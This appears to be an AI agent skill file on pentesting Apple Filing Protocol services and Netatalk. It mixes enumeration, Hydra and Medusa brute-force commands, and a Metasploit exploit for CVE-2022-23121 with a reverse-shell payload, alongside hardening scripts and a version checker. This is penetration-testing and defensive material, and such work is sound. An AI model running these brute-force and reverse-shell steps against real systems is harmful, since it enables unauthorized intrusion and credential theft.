Hacktricks-skills afp-pentest

Pentest Apple Filing Protocol (AFP) services on port 548. Use this skill whenever you need to enumerate, exploit, or assess AFP file sharing services, Netatalk daemons, NAS appliances (QNAP, Synology, WD, TrueNAS), or legacy macOS file servers. Trigger for any AFP-related tasks including vulnerability scanning, brute-force testing, Netatalk CVE exploitation (CVE-2022-23121, CVE-2018-1160, CVE-2022-22995), or defensive hardening recommendations.

Install (from source): clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/584-pentesting-afp/SKILL.MD

Source content

AFP Pentesting Skill

A comprehensive guide for testing Apple Filing Protocol (AFP) services, primarily targeting Netatalk implementations on NAS appliances and legacy macOS systems.

When to Use This Skill

Use this skill when you encounter:

  • Open port 548/tcp on a target
  • NAS devices (QNAP, Synology, Western Digital, TrueNAS)
  • Legacy macOS or Mac OS 9 file servers
  • Netatalk daemon installations
  • Time Machine over AFP configurations
  • Any AFP-related enumeration, exploitation, or hardening tasks

Quick Reference

Component         Details
Protocol          Apple Filing Protocol (AFP)
Default Port      548/tcp (AFP over TCP/DSI)
Common Software   Netatalk (open-source), macOS AFP service
Key CVEs          CVE-2022-23121, CVE-2018-1160, CVE-2022-22995

Phase 1: Enumeration

Banner Grabbing & Server Info

Start with non-intrusive reconnaissance to identify the AFP server type and version:

# Metasploit auxiliary scanner
msfconsole -q
use auxiliary/scanner/afp/afp_server_info
set RHOSTS <target-ip>
run

# Nmap NSE scripts (comprehensive)
nmap -p 548 -sV --script "afp-* and not dos" <target-ip>

Nmap NSE Script Reference

Script           Purpose
afp-ls           List available AFP volumes and files
afp-brute        Password brute-force against AFP login
afp-serverinfo   Dump server name, machine type, AFP version, supported UAMs
afp-showmount    List shares with their ACLs
afp-path-vuln    Detect directory traversal (CVE-2010-0533)

Automated Enumeration Script

Use the bundled script for quick enumeration:

./scripts/enumerate_afp.sh <target-ip>

This runs all relevant NSE scripts and saves output to afp-enumeration-<ip>.txt.

Brute-Force Testing

If credentials are needed, combine NSE with Hydra/Medusa:

# Hydra (recommended)
hydra -L users.txt -P passwords.txt afp://<target-ip>

# Medusa alternative
medusa -h <target-ip> -p 548 -u users.txt -P passwords.txt -e ns -M afp

Phase 2: Share Access & Interaction

Mounting AFP Shares

macOS:

# GUI: Finder → Go → Connect to Server → afp://<ip>/<share>
# Terminal:
mkdir /Volumes/afp
mount_afp afp://USER:PASSWORD@<ip>/SHARE /Volumes/afp

Linux (afpfs-ng):

# Install if needed
apt install afpfs-ng  # Debian/Ubuntu
yum install afpfs-ng  # RHEL/CentOS

# Mount share
mkdir /mnt/afp
mount_afp afp://USER:PASSWORD@<ip>/SHARE /mnt/afp

# Interactive client
afp_client <ip>

Important: Classic Mac resource forks appear as hidden ._* AppleDouble files. These often contain metadata that standard DFIR tools miss. Always inspect them:

ls -la /mnt/afp/._*
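Listing the ._* files only tells you they exist; the metadata the text refers to sits inside the AppleDouble container. The parser below is an added example, not code from this skill or the hacktricks-skills repository. It decodes the AppleDouble/AppleSingle header (magic, version, entry table) and the entries most useful in review: Finder Info (type/creator, the invisible flag, and whether extended attributes are appended behind it, detected by the "ATTR" magic as a heuristic), Resource Fork size, Real Name, Comment, and File Dates. The sample file is constructed inline by build_appledouble; find_appledouble_files walks a mounted share and applies the same parser.

```python
import os
import struct
from datetime import datetime, timedelta, timezone

APPLEDOUBLE_MAGIC = 0x00051607
APPLESINGLE_MAGIC = 0x00051600
HEADER_LEN = 26                      # magic(4) + version(4) + filler(16) + entry count(2)
ENTRY_NAMES = {1: "Data Fork", 2: "Resource Fork", 3: "Real Name", 4: "Comment",
               8: "File Dates Info", 9: "Finder Info", 10: "Macintosh File Info",
               14: "AFP File Info"}
MAC_EPOCH = datetime(2000, 1, 1, tzinfo=timezone.utc)   # File Dates Info counts seconds from here
UNSET_DATE = -0x80000000                                 # spec value for "date not set"
FINDER_INVISIBLE = 0x4000                                # kIsInvisible bit in fdFlags


def _mac_date(raw):
    return None if raw == UNSET_DATE else (MAC_EPOCH + timedelta(seconds=raw)).isoformat()


def parse_appledouble(blob):
    """Parse one AppleDouble/AppleSingle file into a dict of entries and decoded metadata."""
    if len(blob) < HEADER_LEN:
        raise ValueError("file shorter than the %d-byte header" % HEADER_LEN)
    magic, version, count = struct.unpack(">II16xH", blob[:HEADER_LEN])
    if magic not in (APPLEDOUBLE_MAGIC, APPLESINGLE_MAGIC):
        raise ValueError("not an AppleSingle/AppleDouble file: magic 0x%08x" % magic)
    result = {"format": "AppleDouble" if magic == APPLEDOUBLE_MAGIC else "AppleSingle",
              "version": version, "entries": []}
    for i in range(count):
        # Entry descriptor: id(4), absolute offset(4), length(4), big-endian
        eid, off, length = struct.unpack(">III", blob[HEADER_LEN + 12 * i:HEADER_LEN + 12 * (i + 1)])
        data = blob[off:off + length]
        result["entries"].append({"id": eid, "name": ENTRY_NAMES.get(eid, "Entry %d" % eid),
                                  "length": length})
        if eid == 2:
            result["resource_fork_bytes"] = len(data)
        elif eid in (3, 4):
            result["real_name" if eid == 3 else "comment"] = data.decode("mac_roman", errors="replace")
        elif eid == 8 and len(data) >= 16:
            c, m, b, a = struct.unpack(">iiii", data[:16])
            result["dates"] = {"create": _mac_date(c), "modify": _mac_date(m),
                               "backup": _mac_date(b), "access": _mac_date(a)}
        elif eid == 9 and len(data) >= 32:
            fd_flags = struct.unpack(">H", data[8:10])[0]
            result["finder_info"] = {
                "file_type": data[0:4].decode("mac_roman", errors="replace"),
                "creator": data[4:8].decode("mac_roman", errors="replace"),
                "invisible": bool(fd_flags & FINDER_INVISIBLE),
                # macOS and Netatalk store extended attributes after the 32-byte Finder Info,
                # introduced by an "ATTR" header; looking for that magic is a heuristic.
                "has_xattrs": b"ATTR" in data[32:],
            }
    return result


def build_appledouble(entries):
    """Constructed sample: serialise (entry_id, bytes) pairs into an AppleDouble v2 file."""
    data_start = HEADER_LEN + 12 * len(entries)
    header = struct.pack(">II16xH", APPLEDOUBLE_MAGIC, 0x00020000, len(entries))
    table, body = b"", b""
    for eid, data in entries:
        table += struct.pack(">III", eid, data_start + len(body), len(data))
        body += data
    return header + table + body


def find_appledouble_files(root):
    """Walk a mounted share and yield (path, parsed-or-error) for every ._* file."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.startswith("._"):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, "rb") as fh:
                        yield path, parse_appledouble(fh.read())
                except (ValueError, struct.error, OSError) as exc:
                    yield path, {"error": str(exc)}


# Constructed sample: an invisible TEXT file with appended xattrs, a resource fork,
# a Finder comment and a dates entry (modify = 1 day after the 2000 epoch, backup unset).
SAMPLE_FINDER_INFO = (b"TEXT" + b"ttxt" + struct.pack(">H", FINDER_INVISIBLE) + b"\x00" * 22
                      + b"\x00\x00" + b"ATTR" + b"\x00" * 30)
SAMPLE = build_appledouble([
    (9, SAMPLE_FINDER_INFO),
    (2, b"RSRC" * 8),
    (4, "confidential draft".encode("mac_roman")),
    (8, struct.pack(">iiii", 0, 86400, UNSET_DATE, 0)),
])

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                       # e.g. python3 appledouble.py /mnt/afp
        for path, parsed in find_appledouble_files(sys.argv[1]):
            print(path, parsed)
    else:
        print(parse_appledouble(SAMPLE))
```

Run it against the mount point from the previous step to get a per-file summary; anything with has_xattrs set or a non-empty comment or resource fork deserves a closer look, since that is exactly the data a plain ls does not show.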

Phase 3: Vulnerability Exploitation

CVE-2022-23121: Netatalk Unauthenticated RCE (CVSS 9.8)

Affected: Netatalk ≤ 3.1.12
Impact: Remote root code execution before authentication
Common on: Western Digital PR4100, QNAP, Synology NAS

Metasploit Exploit:

msfconsole -q
use exploit/linux/netatalk/parse_entries
set RHOSTS <target-ip>
set TARGET 0  # Automatic (Netatalk)
set PAYLOAD linux/x64/meterpreter_reverse_tcp
set LHOST <your-ip>
run

Manual Check:

./scripts/check_netatalk_vulns.sh <target-ip>

CVE-2018-1160: Netatalk OpenSession Heap Overflow

Affected: Netatalk 3.0.0 - 3.1.11
Impact: Unauthenticated code execution via DSI OpenSession handler

Detection:

nmap -p 548 --script afp-serverinfo <target-ip>
# Look for Netatalk version in output

CVE-2022-22995: Symlink Redirection

Affected: Netatalk 3.1.0 - 3.1.17 (with AppleDouble v2 enabled)
Impact: Arbitrary file write / RCE

CVE-2010-0533: Directory Traversal

Affected: Apple Mac OS X 10.6 AFP

Detection:

nmap -p 548 --script afp-path-vuln <target-ip>

Phase 4: Defensive Recommendations

Immediate Actions

  1. Disable AFP unless strictly required. Use SMB3 or NFS instead.
  2. Upgrade Netatalk to ≥ 3.1.18 or 4.x (the 2024 release fixes multiple memory-safety bugs)
  3. Apply vendor firmware that back-ports 2022/2023/2024 patches

Hardening Checklist

  • Enforce strong UAMs (e.g., DHX2), disable clear-text authentication
  • Disable guest logins
  • Restrict TCP 548 to trusted subnets via firewall
  • Wrap AFP inside VPN when exposed remotely
  • Periodically scan with nmap -p 548 --script afp-* in CI/CD
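Several checklist items correspond to options in Netatalk's afp.conf: uam list (which authentication modules are offered, including uams_clrtxt.so and uams_guest.so), hosts allow (Netatalk's own source allow-list) and appledouble (the v2 setting named above as the precondition for CVE-2022-22995). The audit script below is an added example, not part of this skill or the hacktricks-skills repository. The two configurations it checks are constructed for illustration, the finding identifiers are my own, and the default it assumes when uam list is absent (uams_dhx.so uams_dhx2.so) is Netatalk 3.x's documented default. The firewall rule on TCP 548 stays the primary network control; hosts allow is checked here only at the [Global] level.

```python
import configparser

CLEARTEXT_UAM, GUEST_UAM, STRONG_UAM = "uams_clrtxt.so", "uams_guest.so", "uams_dhx2.so"
DEFAULT_UAM_LIST = "uams_dhx.so uams_dhx2.so"   # Netatalk 3.x default when 'uam list' is unset


def audit_afp_conf(text):
    """Return (finding_id, section, message) tuples for settings the hardening checklist rejects."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    g = cp["Global"] if cp.has_section("Global") else {}
    uams = g.get("uam list", DEFAULT_UAM_LIST).split()
    findings = []
    if CLEARTEXT_UAM in uams:
        findings.append(("clear-text-uam", "Global",
                         "uam list offers clear-text passwords (%s); remove it" % CLEARTEXT_UAM))
    if GUEST_UAM in uams:
        findings.append(("guest-login", "Global",
                         "uam list offers guest logins (%s); remove it" % GUEST_UAM))
    if STRONG_UAM not in uams:
        findings.append(("no-dhx2", "Global",
                         "uam list does not offer DHX2; set 'uam list = %s'" % STRONG_UAM))
    if "hosts allow" not in g:
        findings.append(("unrestricted-hosts", "Global",
                         "no 'hosts allow' in [Global]; restrict to trusted subnets (and firewall TCP 548)"))
    # 'appledouble' may be set globally or per volume; v2 is the CVE-2022-22995 precondition.
    for sec in cp.sections():
        if cp[sec].get("appledouble", "").strip().lower() == "v2":
            findings.append(("appledouble-v2", sec,
                             "appledouble = v2 enables the CVE-2022-22995 code path; use the default 'ea'"))
    return findings


# Constructed sample: the kind of afp.conf found on an appliance with defaults loosened.
WEAK_CONF = """
[Global]
uam list = uams_guest.so uams_clrtxt.so uams_dhx.so
guest account = nobody

[Public]
path = /srv/public
appledouble = v2
"""

# Constructed sample: the same server after applying the checklist.
HARDENED_CONF = """
[Global]
uam list = uams_dhx2.so
hosts allow = 10.10.0.0/16
afp listen = 10.10.0.5

[Homes]
basedir regex = /home
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_CONF
    for fid, section, message in audit_afp_conf(text) or [("ok", "-", "no findings")]:
        print("%-18s [%s] %s" % (fid, section, message))
```

Point it at /etc/netatalk/afp.conf (or whatever path the appliance firmware uses) on each Netatalk host; a clean run means every checklist item that afp.conf can express is in place, leaving the firewall, VPN and version checks to be verified separately.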

Monitoring

Add to your security monitoring:

# Cron job for periodic scanning
0 2 * * 0 nmap -p 548 --script afp-serverinfo <network-range> >> /var/log/afp-scan.log
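The version check that Phase 3 describes (run afp-serverinfo, look for the Netatalk version) and the periodic scan above can also be done without nmap by speaking DSI directly, which is handy for an inventory job that needs structured output. The script below is an added example, not code from this skill or the hacktricks-skills repository. It sends an unauthenticated DSIGetStatus, parses the FPGetSrvrInfo block that afp-serverinfo dumps (server name, machine type, AFP versions, UAMs), flags the clear-text and guest UAMs the checklist says to disable, and compares a Netatalk version against the ranges this skill lists for the three CVEs. Netatalk reports its version in the machine-type field (for example Netatalk3.1.12, as afp-serverinfo shows it); since the status reply cannot tell whether AppleDouble v2 is configured, CVE-2022-22995 is reported with that condition attached. The sample reply is constructed inline with build_srvr_info; get_status is the live network variant and is not exercised offline.

```python
import re
import socket
import struct

DSI_GET_STATUS = 3          # DSI command code: GetStatus (reply carries FPGetSrvrInfo)
DSI_HEADER = ">BBHiII"      # flags, command, request id, error/offset, data length, reserved

# UAM names as they appear in the server-info reply; the hardening checklist rejects both.
WEAK_UAMS = {"Cleartxt Passwrd": "clear-text authentication", "No User Authent": "guest login"}

# Version ranges exactly as this skill lists them.
NETATALK_CVES = [
    ("CVE-2022-23121", (0, 0, 0), (3, 1, 12), None),
    ("CVE-2018-1160",  (3, 0, 0), (3, 1, 11), None),
    ("CVE-2022-22995", (3, 1, 0), (3, 1, 17), "only if 'appledouble = v2' is configured"),
]
MIN_SAFE = (3, 1, 18)       # checklist: upgrade to >= 3.1.18 or 4.x


def build_dsi_get_status(request_id=1):
    """16-byte DSI request header for an unauthenticated GetStatus (no payload)."""
    return struct.pack(DSI_HEADER, 0x00, DSI_GET_STATUS, request_id, 0, 0, 0)


def _pstring(buf, off):
    """Decode a Pascal string (1-byte length prefix) at offset off."""
    n = buf[off]
    return bytes(buf[off + 1:off + 1 + n]).decode("mac_roman", errors="replace")


def _pstring_list(buf, off):
    """Decode a 1-byte count followed by that many Pascal strings."""
    count, off, items = buf[off], off + 1, []
    for _ in range(count):
        items.append(_pstring(buf, off))
        off += 1 + buf[off]
    return items


def parse_srvr_info(payload):
    """Parse an FPGetSrvrInfo block: four 16-bit offsets, 16-bit flags, then the server name."""
    machine_off, versions_off, uams_off, _icon_off, flags = struct.unpack(">HHHHH", payload[:10])
    return {"server_name": _pstring(payload, 10),
            "machine_type": _pstring(payload, machine_off),
            "afp_versions": _pstring_list(payload, versions_off),
            "uams": _pstring_list(payload, uams_off),
            "flags": flags}


def weak_uams(info):
    """Map each offered UAM the checklist rejects to the reason."""
    return {u: WEAK_UAMS[u] for u in info["uams"] if u in WEAK_UAMS}


def assess_netatalk(machine_type):
    """Extract the Netatalk version and list the skill's CVEs whose range contains it."""
    m = re.search(r"Netatalk\s*v?(\d+)\.(\d+)\.(\d+)", machine_type)
    if not m:
        return {"version": None, "cves": [], "notes": [], "upgrade": False}
    v = tuple(int(x) for x in m.groups())
    hits = [(cve, note) for cve, lo, hi, note in NETATALK_CVES if lo <= v <= hi]
    return {"version": v, "cves": [c for c, _ in hits],
            "notes": ["%s: %s" % (c, n) for c, n in hits if n], "upgrade": v < MIN_SAFE}


def build_srvr_info(server_name, machine_type, versions, uams, flags=0x0020):
    """Constructed sample: assemble a valid FPGetSrvrInfo block for offline use."""
    def p(s):
        b = s.encode("mac_roman")
        return bytes([len(b)]) + b
    body = bytearray(10) + p(server_name)
    if len(body) % 2:
        body += b"\x00"                      # variable-length fields start on even offsets
    machine_off = len(body); body += p(machine_type)
    versions_off = len(body); body += bytes([len(versions)]) + b"".join(map(p, versions))
    uams_off = len(body); body += bytes([len(uams)]) + b"".join(map(p, uams))
    struct.pack_into(">HHHHH", body, 0, machine_off, versions_off, uams_off, 0, flags)
    return bytes(body)


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed after %d of %d bytes" % (len(buf), n))
        buf += chunk
    return buf


def get_status(host, port=548, timeout=5.0):
    """Live query: send DSIGetStatus and parse the reply (not used by the offline sample)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_dsi_get_status())
        _flags, _cmd, _rid, err, length, _res = struct.unpack(DSI_HEADER, _recv_exact(s, 16))
        if err != 0:
            raise RuntimeError("DSI error %d from %s" % (err, host))
        return parse_srvr_info(_recv_exact(s, length))


if __name__ == "__main__":
    import sys
    info = get_status(sys.argv[1]) if len(sys.argv) > 1 else parse_srvr_info(
        build_srvr_info("nas01", "Netatalk3.1.12", ["AFP2.2", "AFP3.3"], ["DHX2", "Cleartxt Passwrd"]))
    print(info, weak_uams(info), assess_netatalk(info["machine_type"]))
```

Looping get_status over the hosts the cron job above scans gives a per-host record of version, offered UAMs and the CVE ranges it falls into, which is easier to diff week over week than the raw nmap log.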

Common Attack Scenarios

Scenario 1: NAS Discovery & Exploitation

  1. Scan for port 548:
    nmap -p 548 <target>
  2. Enumerate:
    ./scripts/enumerate_afp.sh <target>
  3. Check Netatalk version for CVE-2022-23121
  4. Exploit with Metasploit if vulnerable
  5. Pivot to internal network

Scenario 2: Credential Harvesting

  1. Mount AFP share with discovered credentials
  2. Extract ._* AppleDouble files for metadata
  3. Look for password files, configs, backups
  4. Use credentials for lateral movement

Scenario 3: Legacy macOS Assessment

  1. Identify OS version via afp-serverinfo
  2. Test for CVE-2010-0533 (directory traversal)
  3. Attempt brute-force with common Mac passwords
  4. Mount and enumerate file system

References


Notes

  • AFP has been superseded by SMB in macOS since OS X 10.9 (2013)
  • Most modern attacks target Netatalk on NAS appliances, not macOS
  • Always verify you have authorization before testing
  • Netatalk 4.x (2024) fixes multiple memory-safety bugs; recommend upgrading over patching individual CVEs